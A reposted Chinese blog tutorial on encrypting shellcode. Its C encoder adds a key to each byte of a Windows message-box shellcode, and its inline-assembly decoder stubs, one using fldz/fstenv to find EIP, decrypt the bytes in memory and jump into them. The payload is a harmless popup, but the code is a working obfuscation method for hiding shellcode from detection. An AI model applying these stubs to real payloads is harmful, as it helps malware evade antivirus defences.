shellcode 进行加密原理

来源：互联网发布：淘宝折扣价在哪设置编辑：程序博客网时间：2024/06/15 22:45

对shellcode 进行加密：

#include "stdio.h"char popup_general[]="\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C""\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53""\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B""\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95""\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59""\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A""\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75""\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03""\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB""\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50""\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90";//shellcode should be ended with 0x90void encoder (char* input, unsigned char key, int display_flag)// bool display_flag{int i=0,len=0;FILE * fp;unsigned char * output;len = strlen(input);output=(unsigned char *)malloc(len+1);if(!output){printf("memory erro!\n");exit(0);}//encode the shellcodefor(i=0;i<len;i++){output[i] = input[i]+key;}if(!(fp=fopen("encode.txt","w+"))){printf("output file create erro");exit(0);}fprintf(fp,"\"");for(i=0;i<len;i++){fprintf(fp,"\\x%0.2x", output[i]);if((i+1)%16==0){fprintf(fp,"\"\n\"");}}fprintf(fp,"\";");fclose(fp);printf("dump the encoded shellcode to encode.txt OK!\n");if(display_flag)//print to screen{for(i=0;i<len;i++){printf("%0.2x ",output[i]);if((i+1)%16==0){printf("\n");}}}free(output);}void main(){encoder(popup_general,0x2 ,1);getchar();}

对shellcode进行解密并运行

unsigned char data[] = "\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e""\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55""\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d""\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97""\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b""\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c""\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77""\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05""\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd""\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52""\x55\x01\x59\xfe\x55\x01\x59\xfa\x92";__asm{lea eax,dataxor ecx,ecxnoop:mov bl, [eax+ecx]sub bl,2mov [eax+ecx],blinc ecxcmp bl, 0x90jnz nooppush eaxret}}

发现能运行后再将它改为这样：

unsigned char data[] = "\x83\xC0\x14"//       ADD EAX,14"\x33\xC9"         // XOR ECX,ECX"\x8A\x1C\x08"      //  MOV BL,BYTE PTR DS:[EAX+ECX]"\x80\xEB\x02"     //  SUB BL,2"\x88\x1C\x08"     //   MOV BYTE PTR DS:[EAX+ECX],BL"\x41"           // INC ECX"\x80\xFB\x90" //      CMP BL,90"\x75\xF1"//         JNZ SHORT shellcod.00401165"\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e""\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55""\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d""\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97""\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b""\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c""\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77""\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05""\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd""\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52""\x55\x01\x59\xfe\x55\x01\x59\xfa\x92\x90";__asm{lea eax,datapush eaxret}}

shellcode加解密完成

但是一般会遇到各种情况，比如插入的shellcode前面还有代码那么这段我们加密的shellcode就不是在最前端，那么加密的顺序就会出错因为上面有 add eax,14

经修改可以作为在shellcode的中间段：

#include "stdafx.h"#include <Windows.h>unsigned char data[] =  "\xD9\xEE"           // fldz"\xD9\x74\x24\xF4"   // fstenv (28-byte) ptr ss:[esp-0xC]"\x58"              //pop eax   得到EIP 转载至http://www.programlife.net/shellcode-getpc.html"\x83\xC0\x1b"      //add eax,0x19"\x33\xC9"         // XOR ECX,ECX  "\x8A\x1C\x08"      //  MOV BL,BYTE PTR DS:[EAX+ECX]  "\x80\xF3\x11"//xor bl,0x11"\x88\x1C\x08"     //   MOV BYTE PTR DS:[EAX+ECX],BL  "\x41"           // INC ECX  "\x80\xFB\x90" //      CMP BL,90  "\x75\xF1"//         JNZ SHORT shellcod.00401165//The above is 25 bytes//The following is 169 bytes"\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d""\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42""\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a""\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84""\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48""\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b""\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64""\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12""\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca""\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41""\x42\xee\x46\xed\x42\xee\x46\xe9\x81";//#panda0#int main(){__asm  {  lea eax,data  push eax  ret  }  return 0;}